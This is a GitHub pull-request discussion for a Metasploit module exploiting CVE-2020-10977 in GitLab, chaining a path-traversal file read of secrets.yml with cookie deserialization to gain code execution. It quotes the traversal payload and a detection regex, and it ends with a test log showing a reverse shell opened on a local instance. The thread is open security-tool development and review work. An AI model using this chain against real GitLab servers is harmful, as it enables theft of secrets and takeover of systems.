[CVE-2020-10977] Gitlab arbitrary file read to RCE
rapid7/metasploit-framework pull request #14422
Opened 2020-11-22 03:15 UTC by AlanFoster

This module provides remote code execution against GitLab Community Edition (CE) and Enterprise Edition (EE). It combines an arbitrary file read to extract the Rails "secret_key_base", and gains remote code execution with a deserialization vulnerability of a signed `experimentation_subject_id` cookie that Gitlab uses internally for A/B testing.

Note that the arbitrary file read exists affects GitLab EE/CE 8.5 and later, and was fixed in 12.9.1, 12.8.8, and 12.7.8. However, the RCE only affects versions 12.4.0 and above when the vulnerable `experimentation_subject_id` cookie was introduced.

Tested on GitLab 12.8.1 and 12.4.0.

## Verification

All verification steps are in the markdown file.

2020-11-22 12:31 UTC, h00die commented
I didn't look through this yet, but wanted to make sure of something.
Typically when theres a chain of exploits, i like to make sure that the items are capture, and bypassable each step of the way.
For instance:
1) i use this against the target and get the `secret_key_base`.  This should be stored in loot/creds
2) target upgrades, or the `secret_key_base` is no longer available for some reason, but the RCE portion is still exploitable.  I'd like to be able to specify the `secret_key_base` value to bypass that portion of the exploit.

2020-11-23 17:36 UTC, AlanFoster commented
@h00die That's a good shout. I'll swap things around after work to support supplying a secret_key_base directly, and fix the msftidy warning too 👍

At the time I didn't realize that the arbitrary file read and the RCE via signed cookies impacted different versions of GitLab. I'd be tempted to put up a separate auxiliary module PR for the arbitrary file read too, but I'll avoid that for now unless there's strong opinions

2020-11-30 23:15 UTC, wvu-r7 requested changes
Nice job.

2020-11-30 23:15 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_file_read_rce.rb
> +      'uri' => datastore['TARGETURI'] || '/',
You'll want to use `normalize_uri`.

```suggestion
      'uri' => normalize_uri(target_uri.path),
```

2020-11-30 23:15 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_file_read_rce.rb
> +        'Name' => 'Gitlab file read remote code execution',
Capitalization, please.

2020-11-30 23:15 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_file_read_rce.rb
> +            ['CVE', 'CVE-2020-10977'],
```suggestion
            ['CVE', '2020-10977'],
```

2020-11-30 23:15 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_file_read_rce.rb
> +        'DefaultTarget' => 0
Add module traits, please!

2020-11-30 23:15 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_file_read_rce.rb
> +        Opt::RPORT(80),
This is already the default, FYI.

2020-11-30 23:15 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_file_read_rce.rb
> +        OptString.new('VHOST', [false, 'The virtual host name to use in requests']),
Isn't this already registered?

2020-11-30 23:15 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_file_read_rce.rb
> +        OptInt.new('KEY_GENERATOR_ITERATIONS', [ true, 'The key generator iterations', 1000]),
Not a big deal, but advanced options are typically CamelCase.

2020-11-30 23:15 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_file_read_rce.rb
> +    Exploit::CheckCode::Safe
It would be nice to print the version.

2020-11-30 23:15 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_file_read_rce.rb
> +        'description' => "![#{Rex::Text.rand_text_alphanumeric(8)}](/uploads/11111111111111111111111111111111#{'/..' * datastore['DEPTH']}#{datastore['SECRETS_PATH']})"
Can this be minimized or randomized?

2020-11-30 23:15 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_file_read_rce.rb
> +    print_status("created issue #{issue['path']}")
```suggestion
    print_status("Created issue #{issue['path']}")
```

2020-11-30 23:15 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_file_read_rce.rb
> +      }
```suggestion
      'cookie' => "experimentation_subject_id=#{signed_cookie}"
```

2020-11-30 23:28 UTC, AlanFoster commented on modules/exploits/multi/http/gitlab_file_read_rce.rb
> +        'DefaultTarget' => 0
@wvu-r7 Will do! Sorry for the ignorance - would you happen to have a link to any docs/examples for what you'd like here? 👀

2020-11-30 23:38 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_file_read_rce.rb
> +        'DefaultTarget' => 0
Something like this:

https://github.com/rapid7/metasploit-framework/blob/2cb2e38c49e8a896032811e5bcb71bbe2ba7297c/modules/exploits/linux/http/saltstack_salt_api_cmd_exec.rb#L73-L77

https://github.com/rapid7/metasploit-framework/blob/2cb2e38c49e8a896032811e5bcb71bbe2ba7297c/lib/msf/core/constants.rb#L54-L101

2020-11-30 23:41 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_file_read_rce.rb
> +        'description' => "![#{Rex::Text.rand_text_alphanumeric(8)}](/uploads/11111111111111111111111111111111#{'/..' * datastore['DEPTH']}#{datastore['SECRETS_PATH']})"
Mostly asking because of this:

```
wvu@kharak:~$ realpath -m /uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../../opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
wvu@kharak:~$
```

2020-11-30 23:42 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_file_read_rce.rb
> +        'description' => "![#{Rex::Text.rand_text_alphanumeric(8)}](/uploads/11111111111111111111111111111111#{'/..' * datastore['DEPTH']}#{datastore['SECRETS_PATH']})"
```ruby
  MARKDOWN_PATTERN = %r{\!?\[.*?\]\(/uploads/(?<secret>[0-9a-f]{32})/(?<file>.*?)\)}.freeze
```

2020-11-30 23:42 UTC, wvu-r7 commented on modules/exploits/multi/http/gitlab_file_read_rce.rb
> +        'description' => "![#{Rex::Text.rand_text_alphanumeric(8)}](/uploads/11111111111111111111111111111111#{'/..' * datastore['DEPTH']}#{datastore['SECRETS_PATH']})"
If I were writing a signature for this particular attack variant, I would look for `/uploads/11111111111111111111111111111111`.

2020-12-07 01:43 UTC, AlanFoster commented
Thanks @wvu-r7 + @h00die :+1:

I've applied all of your feedback, as well as adding the extra `SECRET_KEY_BASE` option for skipping the arbitrary file read when performing the RCE

2020-12-07 01:48 UTC, wvu-r7 approved these changes

2020-12-09 17:35 UTC, merged

2020-12-09 17:38 UTC, space-r7 commented
Code LGTM! Tested with and without the `SECRET_KEY_BASE` option:

```
msf6 > use exploit/multi/http/gitlab_file_read_rce 
[*] No payload configured, defaulting to generic/shell_reverse_tcp
msf6 exploit(multi/http/gitlab_file_read_rce) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf6 exploit(multi/http/gitlab_file_read_rce) > set lhost 192.168.2.33
lhost => 192.168.2.33
msf6 exploit(multi/http/gitlab_file_read_rce) > set username test@example.com
username => test@example.com
msf6 exploit(multi/http/gitlab_file_read_rce) > set password password123
password => password123
msf6 exploit(multi/http/gitlab_file_read_rce) > options

Module options (exploit/multi/http/gitlab_file_read_rce):

   Name             Current Setting                                               Required  Description
   ----             ---------------                                               --------  -----------
   DEPTH            15                                                            yes       Define the max traversal depth
   PASSWORD         password123                                                   no        The password for the specified username
   Proxies                                                                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS           127.0.0.1                                                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT            80                                                            yes       The target port (TCP)
   SECRETS_PATH     /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml  yes       The path to the secrets.yml file
   SECRET_KEY_BASE                                                                no        The known secret_key_base from the secrets.yml - this skips the arbitrary file read if present
   SSL              false                                                         no        Negotiate SSL/TLS for outgoing connections
   TARGETURI        /users/sign_in                                                yes       The path to the vulnerable application
   USERNAME         test@example.com                                              no        The username to authenticate as
   VHOST                                                                          no        HTTP server virtual host


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.2.33     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(multi/http/gitlab_file_read_rce) > run

[*] Started reverse TCP handler on 192.168.2.33:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. GitLab 12.8.1 is a vulnerable version.
[*] Logged in to user test
[*] Created project /test/9IPdPpXn
[*] Created project /test/nkCZIRh9
[*] Created issue /test/9IPdPpXn/issues/1
[*] Executing arbitrary file load
[+] File saved as: '/Users/space/.msf4/loot/20201209105621_default_127.0.0.1_gitlab.secrets_440009.txt'
[+] Extracted secret_key_base e8c47cf33bec2a33bc2d0ec0ed602801d5e63972fd17b28364dde3e6d65ba05dcbcd50789b062f95cce41473fae02f95e31deb83bc62849f742e48ce3f9d9096
[*] NOTE: Setting the SECRET_KEY_BASE option with the above value will skip this arbitrary file read
[*] Attempting to delete project /test/9IPdPpXn
[*] Deleted project /test/9IPdPpXn
[*] Attempting to delete project /test/nkCZIRh9
[*] Deleted project /test/nkCZIRh9
[*] Command shell session 1 opened (192.168.2.33:4444 -> 192.168.2.33:51475) at 2020-12-09 10:56:21 -0600

whoami
git
uname -a
Linux 17444247aeb9 5.4.39-linuxkit #1 SMP Fri May 8 23:03:06 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
^C
Abort session 1? [y/N]  y

[*] 127.0.0.1 - Command shell session 1 closed.  Reason: User exit
msf6 exploit(multi/http/gitlab_file_read_rce) > set SECRET_KEY_BASE e8c47cf33bec2a33bc2d0ec0ed602801d5e63972fd17b28364dde3e6d65ba05dcbcd50789b062f95cce41473fae02f95e31deb83bc62849f742e48ce3f9d9096
SECRET_KEY_BASE => e8c47cf33bec2a33bc2d0ec0ed602801d5e63972fd17b28364dde3e6d65ba05dcbcd50789b062f95cce41473fae02f95e31deb83bc62849f742e48ce3f9d9096
msf6 exploit(multi/http/gitlab_file_read_rce) > run

[*] Started reverse TCP handler on 192.168.2.33:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. GitLab 12.8.1 is a vulnerable version.
[*] Command shell session 2 opened (192.168.2.33:4444 -> 192.168.2.33:51607) at 2020-12-09 11:08:06 -0600

whoami
git
uname -a
Linux 17444247aeb9 5.4.39-linuxkit #1 SMP Fri May 8 23:03:06 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
^C
Abort session 2? [y/N]  y

[*] 127.0.0.1 - Command shell session 2 closed.  Reason: User exit
msf6 exploit(multi/http/gitlab_file_read_rce) > check
[*] 127.0.0.1:80 - The target appears to be vulnerable. GitLab 12.8.1 is a vulnerable version.
```

2020-12-09 17:39 UTC, space-r7 commented
## Release Notes

This adds an exploit module that leverages both a file read vulnerability and a deserialization vulnerability to gain authenticated code execution against various versions of GitLab Community Edition and GitLab Enterprise Edition.